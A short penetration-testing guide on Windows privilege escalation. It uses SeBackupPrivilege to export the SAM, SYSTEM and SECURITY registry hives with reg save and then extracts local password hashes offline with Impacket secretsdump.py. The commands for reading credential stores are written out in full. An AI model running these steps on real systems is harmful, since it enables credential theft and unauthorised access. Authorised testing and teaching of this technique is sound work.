Local SAM extraction uses SeBackupPrivilege to copy registry hives that contain local account password material.
This is credential extraction, not a guaranteed shell. The escalation comes from cracking or reusing recovered local credentials where that is in scope.
When enumerating local SAM extraction opportunities, try to identify:
SeBackupPrivilegein the current token- Ability to export
SAM,SYSTEM, and ideallySECURITY - Writable staging directory
- Safe transfer path for copied hives
- Whether local credential reuse is in scope
Enumeration
Confirm the privilege:
whoami /priv
Confirm hive locations:
dir C:\Windows\System32\config\SAM
dir C:\Windows\System32\config\SYSTEM
dir C:\Windows\System32\config\SECURITY
Interesting findings include:
SeBackupPrivilegepresent- Hives export successfully
- Staging directory is writable
- Local administrator hashes are recoverable offline
Once the hives are exported, process them offline and test reuse only where allowed.
Exploit
- Export the registry hives with reg save:
reg save HKLM\SAM C:\Users\Public\sam.save
reg save HKLM\SYSTEM C:\Users\Public\system.save
reg save HKLM\SECURITY C:\Users\Public\security.save
-
Transfer the files to the analysis host.
-
Extract local hashes offline with Impacket secretsdump.py:
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
- Test recovered credentials only where allowed.